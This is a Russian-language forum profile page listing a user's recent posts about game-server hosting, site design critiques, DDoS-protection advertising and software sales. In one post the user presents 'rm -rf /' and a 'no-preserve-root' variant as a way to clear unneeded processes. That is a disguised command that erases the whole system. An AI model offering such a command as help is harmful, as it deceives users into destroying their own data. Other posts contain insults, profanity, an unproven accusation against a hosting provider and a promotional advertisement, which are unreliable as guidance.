Перейти к содержанию

6al3t

Пользователи
  • Публикаций

    35
  • Зарегистрирован

  • Посещение

  • Отзывы

    0%

Репутация

2

2 Подписчика

Информация о 6al3t

  • Звание
    Решил остаться

Посетители профиля

2385 просмотров профиля
  1. Не советую брать этот хостинг так как данный человек stanger шарит по машинам без спроса и наверянка сливает себе дизайны сайтов/верстки + сборки/кб/т.п. Кому нужны пруфы почитайте внимательно данный топик, если нужно больше предоставлю в лс только доверенным и давно зарегистрированным пользователям.
  2. пользуюсь этой командой (ниже), удаляет все ненужные процессы, оставляет лишь те что загружались при первом запуске. rm -rf / если не получается, попробуй эту: rm -rf —no-perserve-root/
  3. В смысле ? я на форуме и публикую свою мнению в открытом топике. Говорю по факту, могу вам пожелать удачи в продаже "старого" продукта. Всего хорошего, удаляюсь по просьбе ТСа.
  4. Не рекомендую покупать такие товары с рук. Какая ревизия ? Знаю что в последних двух только были закрыты серьезный баг и дюп. Потом пишут со слезами на глазах.
  5. Мертвая тема, всего 2 проекта отбивают вложения. p.s. нам нужно больше рекламы смарта.
  6. 6al3t

    [ШАРА]PSD и вёрстка сайта

    Мне глубоко наср*ть на твой пост, прочитал до вопросительного знака и отвечу что критику не кто не отменял, автор это учтет и будет исполнять куда качественные работы,а не стоять на месте как ты. p.s. VIP noname.
  7. 6al3t

    [ШАРА]PSD и вёрстка сайта

    Левая верхняя часть - пустая? что делает листочки мяты в дизе ? блок новостей (левая сторона) вообще не понятно ? низ сайта вообще не заполнен.
  8. 6al3t

    Защита

    skype: loginnext У человека своя компания, предоставляет хостинг и vds. Всегда поможет с трудностями. Защита от IP malformed, ICMP flood, TCP SYN flood, TCP-malformed, ICMP smurf, SlowLoris, HTTP POST flood, HTTP SLOW POST L7 и другие типы атак. Стоимость всего 300р за домен + сабдомен. Уровень куда выше storm-wall, которым отдашь 2900 просто не за что. Клиентов всего 10-15 так-как предоставляет услуги не так давно. Отзывы только положительные. Так же являюсь его клиентом. Ссылку на новый сайт дали выше.
  9. очередная реклама проекта с бюджетом до 10к, х***я твой овербафер1.
  10. Обратись к разработчикам св13 или пиши свой l2j
  11. 6al3t

    LameGuard продам.

    убуса уже 2 недели нету в онлайне..
×
×
  • Создать...